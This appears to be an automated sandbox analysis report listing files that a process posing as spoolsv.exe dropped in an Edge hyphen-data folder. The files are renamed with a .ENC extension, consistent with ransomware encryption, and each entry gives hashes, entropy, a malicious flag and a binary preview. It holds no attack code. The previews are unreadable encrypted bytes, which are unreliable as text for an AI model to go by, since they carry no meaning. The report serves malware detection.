                                                                                                                                                                                                                                                      SSDEEP:48:5Z0YGYVNBCSP3Ewb+AQDoi3Elq1jeSIAPXCfEfCtUojsPwlpPcAq+sZDw/3NHAiG:5yYzVrCSPEw7QDh38dAPXCfEco0cisaM
                                                                                                                                                                                                                                                      MD5:AB5F87A356CBBEB89AD2B8695572C251
                                                                                                                                                                                                                                                      SHA1:E89BF8056CD144C3D104F5D879ED813DB6EFC5F9
                                                                                                                                                                                                                                                      SHA-256:B66B58B4D91EE99C0551BEED2938CF88C31B2043CAB3B3937B8FD1BD54C81191
                                                                                                                                                                                                                                                      SHA-512:3FF2869C4905DF4E6A2835D13ECFFFDF1AC44ADF6C627F4983A8CA4A811424E6FA63417DB99F786EE6BD0EA8B9C8750F61CF4E807DBC516213FEEE1903A99D8F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:D..}..6..q.....P..-:......f.>/.v.......KRWt..).e.:[.K'.i.....;..em..c...%C.,.u.2_ ....Z.5+.w.b..*..z....93.....<..l^]%.bc0.._....,a`....j...!.......X"%.+g.....D.e.....g',\....Gm+=.h...JvS..pU.0]._.^..*...SP.R..c'.z*.N#..p..@@Gg...w..ai....)B...".1.....|..p......C.............,.i3..:..........>.?...~.....lR..g.G,.;TZ......ZA.......5*.(J......(K....;37n.!bv$...d....k..;....u.h..{s..............S.!.].t\<E...^......|.+....T...V....C.(o..,..+`..>g.?....'.._9.j1..6{..0+."A..}mD..!...@).R+.1.f..J.i.o.[.@S.+bd...............H...C...z...-x.....0F.....W...j..L...f.;.7....U...c.y<T&{....8.8.F.o...v......X=#..|.0.bz....E_...H..@..BZ..:*.7.....T.k.|..Yy.`.p.yV.-e,..Wh..._%PF.V0..5g.6..O.......U.h....a. M..3..3..'.. a~A*.w4a..P...n.a.uH...w.`.2<......r'..+T(n5..R..*........_[=vRo.....F.....N$Y#.......P).?U....3...'.qbH.gE.aW..K..hjl...*K4.s.....]T.eQ#.+....4GE....[C.....s.8..@....\|k..R8.J...0.._{x.S..X.>...+..e.).&..g.b`>Z...XhCRG.U..N.CO...s..S'...\...A..HV&...7

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hu.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):317264
                                                                                                                                                                                                                                                      Entropy (8bit):7.999452541079747
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:U+JsxQANq0SSwOL+CioNaBXGq269X1YGH3tm2pIlbIqmR+cshrjzwMS17XBOrPM0:hgq0SzOg526Z5HEyIldE+csB8MqBEU0
                                                                                                                                                                                                                                                      MD5:567E67DEBE2DB75BC335C27A54995779
                                                                                                                                                                                                                                                      SHA1:F5FB2DCE737C03AECFD51FDEC8E3FD4741C446D5
                                                                                                                                                                                                                                                      SHA-256:23BA57B6F621A4B51F092AFF0132BA77055997256433D037DCFCF5DD4A930C1E
                                                                                                                                                                                                                                                      SHA-512:F582EFE3C42BEE5160191108AB413C03FDA68FFB78433A4FB2DCF962EBB83C0DB71634C19D472AF636767819A684F33332A944971D57718B5A3FC7BC4D132BFC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:^..1mo.;L.TX.+..H.i.......M8..ov..A....s. .!..@h>5.R..c%.>]n.../..7..I$.]1..x.VH.o.d...2@8....|.....Ad...p)U........#.K}.c.......".'}.I".w5.&2.j_.she...._,g.'4U..h{|V..........<f.|.I.e.[...Lw...J=(...^.G....W.0mO-.b<...i.^B... ....V!........M....Y..Rp.sc9.....+)Q...;8....K.K!#.$..f....W....h.J.b.+l.._K.x.|#.......}%di2.Y.`.ix.....)........}V...h.<.u.C.r..}6c2B..f0...(....B=...1.(+=i...A.=hS{C5.;mQ..([e.....Q..F.5.J..0.~.L.wY..+b..\.....v./}.T.y.. Y...h;..T.NL...$.#.......`......3.......:....^......G..w..X..[...=..`...k.z|.A._.....kD.....5...5oH......W@.B..q.m[WD..{....|...8..e1.|.!k...}....8..R.A...v8..NE.o3|.....P.......b\.. S...*.R....3...D..s....1.vy.......}..-....!z|.H..#.....w+....2.^..&.............P....-./.m.......in..b.fK?Fbz...^l.kC......d{y.*.s"U..U>.~wA...?K.{+T....$s.L.J....*.|. ....~...$.$..8.`.i.u.MI..I9.w8/4..2.S.).z...:....cr....l.,..}...[x2....|...:..@vB..l.T`.a...Y.-..WXO.%.T.;V...BO...&.'.*.....-....|.........W.wj...^..g

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hy.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):608
                                                                                                                                                                                                                                                      Entropy (8bit):7.663861289417443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:WjbfHa6B04AOptZLsz8Dp3Cvdue0KMwPOmuPjS3JQJUnwv:WXHfB04A2Qz8DpSNMuOmuPj8Qga
                                                                                                                                                                                                                                                      MD5:E6F8CB87A89CEC08D0B537AE38F4F94F
                                                                                                                                                                                                                                                      SHA1:35E2012602D7F24D1F040407A693FA3D84C3A202
                                                                                                                                                                                                                                                      SHA-256:3BB66B3601276F5D64294AB9A0D79D063AE66BC372DE979366893252119B7565
                                                                                                                                                                                                                                                      SHA-512:77F74CDF91387DDE910F262CE0F89ECD7481A6B8C276DB96E14906ABCC062D3C833563639BF14D528DABAD9D77BE7555861D4BB8C2D8EEFC29F3D7F14198B043
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....9.g(nO..U....l...+........hn....&..~..2.....J..9.......z...Qp..Pl.s.-.]..C.y.a....QL./.p....*...6.cXO.....4Sw.7`..#.f.x.....?..[s.._5..;....#.:......w.f....m.....&1k".....2...4.Xe3..@..8.Q..z..<J.1...p$>...G.... ..........E....b.2q, .j..C&..L(......b.yr...2Q..eO......t......%J...j.sti....d..Jo.m..~....~-..\.^F..P.`M..D..2.O..NL.B..,.1,Q..7N...E.\.}...H./."......A-....~Lh...Y.....=.\..@....L.O..]QS....pHC..*.....J..].8X..il!.....W.c..s...&.....?..9.........A.LJM...u/.......E.a...kJ...F.b.j.u....2..-.d........j..3..<........5=s.*.R.U..Q..x..W....g..n`.[aE.Lu....-6.tA_..J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-kn.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):720
                                                                                                                                                                                                                                                      Entropy (8bit):7.710665542827278
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:RqcpH3xXOQ9ulqLCM6gw2lZeQEdDtJyJ7fMBKIZfpgYhD1Sbb9B:QcpXx+iulqL76gwq0QEzWfMgYJyB
                                                                                                                                                                                                                                                      MD5:C94D14651C5EB72E844238926E76E916
                                                                                                                                                                                                                                                      SHA1:565F0C1C41C82104FB61A786BDAFC8B121229775
                                                                                                                                                                                                                                                      SHA-256:1D2B124AAA6F42FB4FCBD156AEEF0BF40D022AEEE5C368F21805F858C08D8B7D
                                                                                                                                                                                                                                                      SHA-512:819D3115D0C6D688A851C882F01058FD16E7C68C22070917F95EFDD5A3A4FD8BD5CFAA7A385FBFB8E569D98191514E01385B12E92CE3FAF09BD9A17F3B91F5B6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(.Cg@.\...\...p=.....!Vu.n.........L[;GV...lW=...=./.]M......0.h...+E.......U..}...#.....l.......MX^.....2..Go9.....I..z(.I|v.h..?.^S........N..G.eFnT3>..^..=< .WP...K.d..>x.!...<R.2I.GWY<$.4.r..u.....".u....n.oh.K4..YU.a.k..xZ.JT.-.=P...}..JG]&E..;......>....5%#..../\:.[.Frg..\.e.(.ccq..}W6.-{.NU..C.JYz.7.D......G.lK........Lb.w!7.7n,36$....U.Rh..K.....vI.!.rL...r..-0..C.BG2.v.QPl.........,9.....W...*PQ.....i.(wi.0%...>Y.WcW..7..A.M..f.Fe...z..xI...m...]..d.M.........`..83........e.R..2c(.,A..F$@........w9.f>......a...=.&..**.......V.}.?...4......7.L.R*.....XX...GHs.:.......}..U....ig.q...K..5u.....L..b.2.6:8.(.5../.D.a.`.vr.C.... ....P<AQI.s;....}|.q.c1.@^..TU.*.Y.M...,..G...,

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-la.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1840
                                                                                                                                                                                                                                                      Entropy (8bit):7.896583728893482
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:afYZ69oJ9xxTQsEnWRT0uRRNKBPOsWJwOGAgAE4lXF/IT1Z:dZAoVdrng8AJOskNOj
                                                                                                                                                                                                                                                      MD5:E3720A57DB7DD52B3EC1D857279CC7F1
                                                                                                                                                                                                                                                      SHA1:A3D4F76998A26B51C4274191B67978D33A7933DB
                                                                                                                                                                                                                                                      SHA-256:D992B66FD8C090682CBF135D4E2F08840057FC2C8AEFBEA37D60B07D00CA97E6
                                                                                                                                                                                                                                                      SHA-512:B0BDD407E69C7674DCA2C240B02885F9667BDC33689365975654201DA7DE07387F66F752D0C5D889994DDB96227A6D1CE3B466A3C2E5DD8A076EC4CCE39ECF76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...M.....>$..j...i.3.Hf.....o.;...9.p.e.6q.~c.....a.....eK..L..B.S..#....!q.4.........W.....bE...X>..8..O q..].o.Ld....e_(.+......?M.@]./e....V...x..u......}.h..\}%*....m.-..9.. ..h;t~..K..5..o.b.^.1.e.O<HI.......j-?..$[_bj..#W....9J.5L.....`.%`.6.bb....E.......6qdgul....<i.......J....`..(..B....nW,.....Tm_.:^..L......E.[.T..8........../..1uL...:....N`.*.m.._r.D...Bv...$.v..iK.=....0~...*.f.H.)....il..gB....U.RtH...J..B..*.'?....<.......x|+..;.q^.&..b}*......tcVS$...K..!.......2.......e......1.N.bx.:._0....b...$.....*.. _....Xp..`?.....T.Xu........\...Q.7...;P9~}...J.......Eu.y...Y....,.v.J.....h?....T.}..`....p...`.C?...B:..N2.l.y.X.-..i.Y...~.s.y..$.4.R.pYw\..h....`.%.I.......]JkI."..-..h..~...fvb..........K/......-[..zJ....G..C...%|V;.|z.(.S.B.g5TN.j.M...L..Y.E.#xc...2.e.7].........Z'c.#..;V.xF.qc.b.i...Z..r.3.......PW.V....@...%..o..f1...c......~...R.v...!.8o.3.#...d5...J H..s.$.7..R(*....^..+.x.V...R.....7.v.:=[.i..;.~.g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ml.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):784
                                                                                                                                                                                                                                                      Entropy (8bit):7.716779531320163
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:DWSp0wLogUlKDoAbdJyvAiFhrAwyj896x:DTqSog2KDqAiryC6x
                                                                                                                                                                                                                                                      MD5:7D5FB4C0667BF668FEEA20A145834609
                                                                                                                                                                                                                                                      SHA1:3D32F93DC77F48192268F1A225DFD3846492945C
                                                                                                                                                                                                                                                      SHA-256:964B5432E0AA267A27A40028983AC5944D3EAB9156852D0EF4604078F25A751D
                                                                                                                                                                                                                                                      SHA-512:74C39AAC96A11AC9460CD1967D43892E19D612E54BB4095C23DE4C2CFE32BA5DCA2E26B9FFE39A8474C8C4CE2F842835AADD1D6253B0A6C13D906D30EDF8427D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........A-./fpM.o_.(.).......W.;.Z._.Z.ge.k.ZpIs..H;..Oj..tD.l......TW..S.s.N....J}..u..4......Sft.h~"[..G .n@.#...b?...;.6.................eK.~{....E.!..4.n..y.^.L...iq..m..=.W#...B.F.....(.Ua4.Z"..D.[M..]...6.$..O.e......r.!N.t1...9.e..#$......p..el...Ukx.......7.....k....Sh2nf=ie...$...&..rU.KI)[.|L.....{X..1+=u..S..J...g..xi.(..x....W....t...Q9>j.....'rA.p.+...I.......Xs..e..>F..I._k.D.=..dN.....8..H.?....}.....D.}.|..y.>X...I.w...../3r..w...f.o;.0./.~w...&.((...../......+.*..Q.R. G......sf....<...F....Z%.......f.4@+."!..-.=<C0.......].)..........Pv....~.L.k.D.$n...s...>+....s.S..E.........|.D~...c.*....G.N.tj.].........$.....)..U.N.......T..6qC>3..m`....Tb.)D......._?.Si.&...=..@.6.&..L..7g.["=..$.5...!....p....rm....K.c-.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-mn-cyrl.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Dyalog APL mapped file 32-bit version -105.-96
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5152
                                                                                                                                                                                                                                                      Entropy (8bit):7.963362677497104
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:LK3sMw0ljhvY7Fe2Pr0ceoqBXsv7N7oCETK++6kpmDwdqRLz/QsE:LQsrpJAYqBX4poBV+6kpKhrQsE
                                                                                                                                                                                                                                                      MD5:2F7889EFB9A665FB60587895C5074E4D
                                                                                                                                                                                                                                                      SHA1:5679881EED344204C36360AFA697011C13E59D12
                                                                                                                                                                                                                                                      SHA-256:D5414E66106AD1C3AF4D3B9E8BA1B255112BD1426C989CB0D29F28F6E9E740AC
                                                                                                                                                                                                                                                      SHA-512:A56C469CAF8D208B9F3438ECBDA97DC6088738CC48F2D31985C012EFB22DFB7393DED85E083BC256F320AE4B12ED655095C05E3CA9102AC3FFF129873A961B49
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....wQ.='qy.]..$,...;}.....KRG....."E.S..E%Lp.`Gt..#t0.h.c.U...<...,.....J....{.t............Cu./...4..3..M..A.8...X]........yQ;i...^@b.zH...d..@rT*o.^R..X..[D.K.:.F.....PtT...AFs..<.+.+K.H7.C.*...{/[2..6h}.....'.v.R.u..z..l........9>.......c.[......I.0.5$.+.xg.1O`..~...sH.Ge:'..G...Mo'a.5f@o..1.a=..t.I.......`......R7#,...yB*{5....;.\..7......]..K.W..Q..u..]r.*.......#c... .......|w'R.X%...'QC...P..u.i.!..1......i..{0.Y.T.......t.0.p.G.G..g...GE:G....@.M...O.0.K.M...C]....A9..GE.r...T...d.zV.h3`?..f._g.._.%.. M..$xv.V^.z".j...d.r..D.....j.Z..W...b......x....:^7#.0.......ZFJ#..Io.M.l..NL.0Z./S...+>.....1....v..:..h...l.x..>c...... 7..G.[..X..V..l...%.....;...koV...H......;.._>...*..-5.i.....ri..l...Q...a.........f.:~..^p....w..)....(..+.m..PG._,..1^o...70:.-.b.UDe..iga>...[...w%WQ&..8"...N...%F..@U.M.$...hm.._Gc.E.v\.&.zK...v.)~n..HF.........z.V..&..%...v.E....x.(?.0.5...#{P.0.:...n./u[Qv3.iZE..l.Q<.....v..t.......Q....\W.M6..Aci'

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-mr.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):688
                                                                                                                                                                                                                                                      Entropy (8bit):7.680265330442788
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:vUGM3bGwfKpyvQrId80fg/12AgZA3K+nsrQP7+Ejpa7QmKGuBhD+uMkQCy5p8zEK:IGiKp0Qrm80f82AgHqsrQzhjpa7Qm0DV
                                                                                                                                                                                                                                                      MD5:248D88240EBB54463D81EE6667B906A7
                                                                                                                                                                                                                                                      SHA1:3A6ACFA7DA8DA091FA569329F763BCA62B00441E
                                                                                                                                                                                                                                                      SHA-256:A30BC49D0FD721B6C59F8267AA4F5581A3E68BA6292C905836F62F23C96C2C60
                                                                                                                                                                                                                                                      SHA-512:4C6A9031E376DBE039E972A4E6A3B82577143892A4381FD2BF43816BA50B8A2C9FB913FEE43B8CD2FE90E6D85350033985C76F19BC0CC1D04C963DF5F1FAC6AD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...M.....>$..j..j_.&.3.J.Z-t......KY.....[y.=.h5..wUs.n~...7.Di.<nn...pC..=z..Py7....;...i...4p..#......n.;.@......s(9...J.IY...........}.J.#..<.....>....O......b....I'&9+[.C........M.....K...{\".e3.Ud.=..?...=..K..64....s.......|\M....`Ylf..:...b!.w`..RRe....RWwY..A..........q#h.Y..58....Gf.&...uq.....O4.L..m*...v..D.6..N...&.@y..h...4.%...~..:}n.`....>q4.I..^.a....E...s)...PR.h.?Nw\......>..:.E.@...[.t&.|..?/....].i..L......t.m.b.5...T.[..%...%..... ...i..&..Q...R*.^.........Q).Z.0....\..B.9_.W..,....T....X8...hnc.eex.j.o.#....?........9[#.DU....[..._.r.61e...s...n.Nx..5#........)@)...........9$...}\...D.h... ]@YS.-.....J...s...?.H.....!...V8..I7x.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):145264
                                                                                                                                                                                                                                                      Entropy (8bit):7.998896792394438
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:fldOn71Y072zOpwSXp+P0nM4N9ahQa7lyQ4yip54FYF:n8719CON+cnfG5ir4FYF
                                                                                                                                                                                                                                                      MD5:87902A317A769C825814150B72307E40
                                                                                                                                                                                                                                                      SHA1:9F0BF8961CD18018ABAA0A50864CB4B4FAB3FE9E
                                                                                                                                                                                                                                                      SHA-256:3B64D2C86A0CA305AA4A963F99791B8F6F7680D421465C7FC99024173A07351E
                                                                                                                                                                                                                                                      SHA-512:124F5DE436192A38BE816A2A2AB68ED51D81F2CF0EF8A3CE3E8D369A4ED87B1966927BBE9DB89DDC15FB6A693CEF00534A3D25CB4904171EB9B76DCFA0EB61E7
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:o..I....lF....L.Vz[.u 2a.:{.}&L.t....St...Ot.D.E.5....,ie..7.../.`...^....P-..:Ow.+...oW......L.S;y..3Y....W.<UA.*C..........TB(..iN.......fgb.. 65....."w.....M*S....5.W.b.JV..9@.'..D..$.;.h.....u.W..."..o..4X.z.|.a...'XF..q...p.^....0..b.Oj.d.\.[.G..#..m.-..i..1...^.)t.G.b.....&.......r..}.|j........3..x...5.dD.b..~.L.,%s![0.....Pk..q..E.;.2E.......3.P.2....73x...../...%./4..].O.#h.hR._....t/....^...B|..l...CSrT.,*4..e...*..V.O.?...E..Yw..m..__jn..YC..jqwT+m,..9..q!..o...93......3w...4eU.Y..W$.(..|...UB.......^u...jM.,.pJ..:.....C..C......?z.........>.0?.V.KU...l.5..gC,....7..{@...9......6..({......'T.1.{(}<....m...B.v.....o-..7`..l..g...6....C.';..G..Mol/;..4c.8..L.c...K<..4..v..\Di]>...F..Q&`..=-...7.o./......._.l.-.Z....Z...A..*........t.....~.t.B)..>..H.....g...BQ.+e......r.al.(.....W4N..I:S.B.$.......J(.B.<*r-.f..f#..!...]. ........NS....t".nX...x.V.Ni...a.K..{..@.!,....L9...[.NW@p's=ll.85g.?.-.?N.c.E...v.$H.....w~..>O25...,.Es.Vg~...}....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):145264
                                                                                                                                                                                                                                                      Entropy (8bit):7.998897682667696
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:fldOn71Y072zOpwSXp+P0nM4N9ahQa7lyQ4yip54FY0:n8719CON+cnfG5ir4FY0
                                                                                                                                                                                                                                                      MD5:A5B0C32386BBF07E2078A599789EF42F
                                                                                                                                                                                                                                                      SHA1:97BD676A355B5AEB5ADA9707F11E241F8B674D84
                                                                                                                                                                                                                                                      SHA-256:567B6FB7C790CE63147F7252FEC89308357EA306AE070061490E118AA936A6FE
                                                                                                                                                                                                                                                      SHA-512:D87C6EE8B2BA36F5ACEED3EE111B228FD5AABCAD5BF5D86780E20B858523DAA9468861C7A02CF3873E0F49F8AF5CCFCA0AE7C0DA5B968BF1C90E334C8A29F0DA
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:o..I....lF....L.Vz[.u 2a.:{.}&L.t....St...Ot.D.E.5....,ie..7.../.`...^....P-..:Ow.+...oW......L.S;y..3Y....W.<UA.*C..........TB(..iN.......fgb.. 65....."w.....M*S....5.W.b.JV..9@.'..D..$.;.h.....u.W..."..o..4X.z.|.a...'XF..q...p.^....0..b.Oj.d.\.[.G..#..m.-..i..1...^.)t.G.b.....&.......r..}.|j........3..x...5.dD.b..~.L.,%s![0.....Pk..q..E.;.2E.......3.P.2....73x...../...%./4..].O.#h.hR._....t/....^...B|..l...CSrT.,*4..e...*..V.O.?...E..Yw..m..__jn..YC..jqwT+m,..9..q!..o...93......3w...4eU.Y..W$.(..|...UB.......^u...jM.,.pJ..:.....C..C......?z.........>.0?.V.KU...l.5..gC,....7..{@...9......6..({......'T.1.{(}<....m...B.v.....o-..7`..l..g...6....C.';..G..Mol/;..4c.8..L.c...K<..4..v..\Di]>...F..Q&`..=-...7.o./......._.l.-.Z....Z...A..*........t.....~.t.B)..>..H.....g...BQ.+e......r.al.(.....W4N..I:S.B.$.......J(.B.<*r-.f..f#..!...]. ........NS....t".nX...x.V.Ni...a.K..{..@.!,....L9...[.NW@p's=ll.85g.?.-.?N.c.E...v.$H.....w~..>O25...,.Es.Vg~...}....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-or.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                                                                                                      Entropy (8bit):7.740892908497418
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:u2DdZpZOTaAev121xiX+fKoQmj+NDbzmh4Sb8EjDYJ+aMNdahmL:ndZpT0DiX+fKod+ZzW4SJAJEdUmL
                                                                                                                                                                                                                                                      MD5:64FBC27E86704BFE9A120BBE5C861A19
                                                                                                                                                                                                                                                      SHA1:48065D1B3CBEC2288491436991A521D6785B73D9
                                                                                                                                                                                                                                                      SHA-256:937D30111BD5150FFC2E8D4CFB7A28F166321B98B0E8CA2DBF4EADD3BE3C8942
                                                                                                                                                                                                                                                      SHA-512:7DCE0C641BAB05833E812D9DFF4FD5674DCD8D8C2CB649E973AA47040A6262128318A219AD9ADE93B3F52DE1D2DED8B581D17B6FDB0EEACAA0050EB6E8FCB7C3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:8......lM0...(.....D.......^.s.@...e.)..J}.\.....N..4..D.hB-p..........&..k.r.>..b.....r1....^G...2....5..Q....5.$.5l.17....2.xb.g<.y^.....X....k...>........q.!..1.OByk.c.....<f...e..|.J3...F.#.n..\..(@"[..U!_.h....>.Q....R.S<i8......u.|.wf.....+.......[g.@..u.f..jK..L+...@..55..._.`.6.+\.....A.{/.6.(.P.Yu..Ux...)`.+._..0..%...=QF`...._g../t. .[..Y1.....2..e>Yi>.8."9.....0.'.;.....i:+.....:....]nA......I...w.K=.e..e.1-q...8.....MH..m.t-...E.o......'.v...4..d...x$..;........U.....Z..Zh.1~..B1.%.?.....sCgYJ0~T...$.H..4V..?...~XTr..W.........j...6.m.7.)....-FP......e.tQ....z+.K.QD...v...2..S.E..}.+#...;_!8z..~....I..~.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-pa.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Dyalog APL mapped file 32-bit version -105.-96
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):608
                                                                                                                                                                                                                                                      Entropy (8bit):7.606015299592433
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:YF6npCJMVXXoFJgsighE1l24lAFe1CuGAE+J+kvryb5hBey/dJnXFU+z9hLA:vVoFOMh74l3GLkvry1h0ENC+z/A
                                                                                                                                                                                                                                                      MD5:F382637DD3FE2464A11818B8CC5E5269
                                                                                                                                                                                                                                                      SHA1:79672B04594E144D1AFDDEDB9E73CBAA86ADA230
                                                                                                                                                                                                                                                      SHA-256:BFCAA593AD38C12EF94CE2CA588C8D3BCB1000BBFABE5F12336B3F2389C67F81
                                                                                                                                                                                                                                                      SHA-512:ED6C3C218914C7E5B1E75F09DF5AB3E2FDECB03075C4F72AB23480FE47F81E48660115444D1890EFA7EA6288424BA6C513311F4A50D54C658F43FDC2094CCE0C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....wQ.='qy.]......._..3b.....'~..%i......a2.~..u~Bzw....B.`.....;.2.K...+.%.H..{.f.Vc....u....e.H....MP.^H......9..1.?>..).D.\.A.....(:e.or.~}..%.....hR.>.|.i.*.R.2@.&kBY.u..f....e......<|:.!.M>.......k}...n.u.:...{.........2F...a.....{9..A.J._P.1.6l.i4.<.#..U.46G.?9.....+.+.$!.iFqI......sk......F".i.......S...x+...sw.....B..p4q...l.@Wj.G2...wC~.\o..41.}.Y.....@H,8.`.....*.g~.O.HU[....Wx..g.OyA~.....w..%.....w.'..$D..i..|K.....O..4..Wz|xV...QfF.....`-...@...u^.C....8..}...Q...S$...C.Uq.S~h.o..A.......Ts.v...:.r..X[...O.;..C#u.V......V....1V...G......%....7.6b^_`Z!...V}...+.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-pt.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.866360316634057
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:eCJM7h4owmq0vZMZQvfAF1Actb29KXCbEvxU9gNQgL5Nib9WU++YwMYfx8U:YhhwmvvdHA0c29KSqxUWCgL5I5TdMYfr
                                                                                                                                                                                                                                                      MD5:A1E34BF10ABFBE0E92572A3525BAB1D2
                                                                                                                                                                                                                                                      SHA1:B709E99E7B90E537542D9D3BAB24D5768372177A
                                                                                                                                                                                                                                                      SHA-256:AFABD3E2BEC2963DA71CCA1DCE8943A5A638EF429893F387FF6B96C850F9A27E
                                                                                                                                                                                                                                                      SHA-512:128393A3D93E9B9C388169C874BB00BF85FCDAAA0AA496A939C92B22DD419728422E08A84043541759BC32D8A6984FF439F46EFC1876D4997563F0FDCA6FC839
                                                                                                                                                                                                                                                      Malicious:false
